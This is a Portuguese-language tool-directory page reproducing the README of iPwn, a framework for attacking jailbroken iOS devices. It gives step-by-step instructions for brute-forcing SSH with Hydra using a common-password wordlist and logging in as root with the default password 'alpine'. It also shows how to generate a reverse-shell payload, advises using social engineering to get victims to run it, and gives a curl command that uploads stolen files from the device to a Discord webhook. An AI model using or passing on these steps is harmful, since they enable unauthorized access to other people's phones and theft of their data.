Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
iPwn — Um framework destinado à exploração de dispositivos iOS. | Kitploit
Ferramentas/GitHubGitHub/brows3r/ipwn
Segurança iOSAtaques de SenhaGeração de PayloadsExploraçãoPós-ExploraçãoTestes de PenetraçãoSegurança MóvelFerramenta de Acesso Remoto
GitHubbrows3r/ipwn

iPwn

Um framework destinado à exploração de dispositivos iOS.

Ver Repositório
23336há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

iPwn

Um Framework voltado para a exploração de dispositivos iOS. image

<!> LEMBRE-SE: O IPHONE QUE VOCÊ ESTÁ TENTANDO ACESSAR COM ESTA FERRAMENTA DEVE ESTAR COM JAILBREAK <!>

Status - ❌

Este projeto ainda está em desenvolvimento. Estou adicionando mais extensões e opções para pós-exploração para coletar informações do dispositivo e outras coisas. Também estou trabalhando em uma forma de colocar um payload em um tweak normal do iOS para que obter um reverse shell seja mais fácil.

Registro de atualizações

[6/2/21] - Adicionado um menu extra para pessoas que têm seus dispositivos conectados ao computador e desejam mexer neles. Em breve adicionarei mais a isso.

[6/2/21] - Adicionados 4 módulos extras para a ferramenta de pós-exploração 'iSteal'. Também adicionada uma opção para instalar o jailbreak checkra1n.

[5/25/21] - Adicionados 8 módulos extras para a ferramenta de pós-exploração 'iSteal'.

[5/25/21] - Adicionados 2 módulos extras para a ferramenta de pós-exploração 'iSteal'.

Descrição/Como usar [PARA INICIANTES!!!]

iPwn é um framework destinado a explorar e obter acesso a dispositivos iOS. Ele também possui uma extensão que é um mini-framework chamado 'iSteal', destinado à pós-exploração (após obter acesso ao dispositivo). Esta descrição irá guiá-lo pelas diferentes formas e etapas para obter acesso a um dispositivo iOS e extrair informações dele.

A primeira forma de obter acesso a um dispositivo iOS. - SSH-Bruteforcing.

A maioria dos dispositivos iOS com jailbreak e Cydia vêm pré-instalados com OpenSSH. E geralmente, as credenciais são muito fracas ou comuns; uma das senhas mais comuns estará incluída em uma wordlist que deve estar na sua pasta se você baixou o iPwn do meu Github.

Então vamos começar! Primeiramente, vamos executar o script.

root@kitploit:~
python main.py

Em seguida, vamos digitar o comando 'brute'. (Se quiser digitar help e se familiarizar com os comandos, pode fazer isso.) image

Assim que digitarmos o comando 'brute', digite 'help' para exibir todos os comandos disponíveis. image Agora, vamos usar o comando 'default' para iniciar o SSH-Bruteforcing com uma wordlist contendo as senhas mais comuns. Será solicitado que você insira o endereço IP do alvo; certifique-se de inserir um endereço correto e válido, pressione Enter e prossiga para a próxima etapa. image

<!> SE ESTIVER RECEBENDO ERROS, CERTIFIQUE-SE DE QUE O HYDRA ESTÁ INSTALADO. VOCÊ PODE INSTALAR O HYDRA COM OS COMANDOS ABAIXO <!>

root@kitploit:~
commands to install hydra:

sudo apt install hydra
sudo pacman -S hydra

Agora, de volta ao tutorial: se você tiver o hydra instalado no seu PC, ele já deve estar tentando fazer o bruteforce. Espere cerca de 20 a 40 segundos e, se o dispositivo usar as credenciais padrão/comuns fornecidas na wordlist, o Hydra deve exibir uma pequena mensagem mostrando a senha correta. image

Como podemos ver, a senha correta é 'alpine'. Agora podemos fazer login no telefone executando 'ssh root@ip_goes_here' em outra janela de terminal. Quando solicitar a senha, basta inserir a senha que você obteve do Hydra. image

Agora estamos logados! image

Neste ponto, provavelmente queremos coletar algumas informações do telefone e controlá-lo; isso virá depois. Porque primeiro, precisamos instalar algumas coisas muito importantes. Se quiser usar SCP para transferir o arquivo de configuração que automatiza tudo, você pode fazer isso. O arquivo está em /post-exploitation/post.sh. Depois de transferir o arquivo 'post.sh' para o dispositivo iOS, execute-o com 'bash post.sh' e ele deve começar a instalar e configurar as ferramentas de pós-exploração que usaremos.

<!> NOTA: OS COMANDOS ABAIXO SÃO APENAS PARA PESSOAS QUE DESEJAM INSTALAR OS PACOTES E FERRAMENTAS NECESSÁRIOS MANUALMENTE <!>

root@kitploit:~
run all these commands to setup/install everything thats needed:

apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git

Ok, agora que temos tudo instalado, podemos entrar na pasta 'iSteal' e executar o script de pós-exploração 'iSteal'.

root@kitploit:~
python3 post.py

<!> NOTA: Certifique-se de que, ao executar arquivos python, você use "python3" em vez de "python" ou "py" <!>

Agora o script deve estar carregado; se quiser usar o comando 'help' e explorar, você pode fazê-lo. image

Agora, vamos usar o comando 'list' para mostrar os módulos/opções disponíveis para pós-exploração. image

<!> LEMBRE-SE: HAVERÁ MUITAS ATUALIZAÇÕES NO SCRIPT DE PÓS-EXPLORAÇÃO, E MAIS MÓDULOS SERÃO ADICIONADOS, PORTANTO ESTA IMAGEM SERÁ ATUALIZADA PARA MANTER A PRECISÃO <!>

Para usar um módulo, basta fazer 'use specific/module'. Exemplo: use modules/list_installed_default_apps

E como você pode ver, ao executar esse módulo, ele nos mostra os aplicativos padrão instalados no dispositivo iOS alvo. image

A segunda forma de obter acesso a um dispositivo iOS. - Reverse shell.

Agora, vou mostrar como fazer da segunda maneira, que é um pouco mais avançada. Lembre-se de que não incluirei imagens para esta parte.

root@kitploit:~
run the iPwn framework by doing 'python main.py'
type in the 'payload' command
wait for the payload factory to load.
select a payload of your choice, Example: use payloads/factory/reverse_bash
enter your IP
enter your Port
then you should get a message that says 'payload generated'
type in the 'back' command to go back to the main menu
type in the 'listen' command to start listening for incoming connections
make sure that your victim runs the script via terminal or throught their own way, try social engineering, be creative!
once the script is executed on the victims iOS device, you should get a connection
install the important packages via transferring the 'post.sh' located in /post-exploitation and executing it, or manually do it yourself.
you can now run the 'iSteal' or 'AutoEnum' post-exploitation tools
have fun! :)

<!> Se você estiver fazendo o passo 2 e travar na parte em que precisa instalar os pacotes/ferramentas importantes, vá para o passo 1 e copie o guia para instalar os pacotes/ferramentas! <!>

Transferência/Extração de arquivos

Existem várias maneiras de transferir arquivos para o dispositivo iOS e também muitas formas de baixá-los. A maneira mais fácil de extrair e baixar arquivos do dispositivo iOS é usar o Curl e um webhook do Discord.

<!> NOTA: O segmento abaixo demonstrará como extrair e baixar arquivos do dispositivo iOS usando curl <!>

root@kitploit:~
Step 1: Create a discord server
Step 2: Create a webhook and copy the link
Step 3: On the iOS device, navigate towards the directory that contains the file you want to retrieve.
Step 4: enter the command below (replace file_here.txt with the name of your file, replace webhook_url_here with your webhook url)

curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here

Step 5: wait around 10-50 seconds
Done! The file should now be uploaded to your discord server. You can now download/view the file.

Sistemas operacionais testados

root@kitploit:~
Windows 10 - Stable
Garuda Linux - Stable
Arch based distros - Stable

Dispositivos iOS suportados e testados

root@kitploit:~
Supported Devices [A extensão de pós-exploração deve funcionar para todos estes]
-----------------
iPods newer than the 4th Gen iPod
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12

My own tested devices [Aqueles que eu mesmo testei pessoalmente]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod 4th Gen

Capturas de tela

image image image image

Créditos

[https://github.com/0x1CA3]

Baixar ferramenta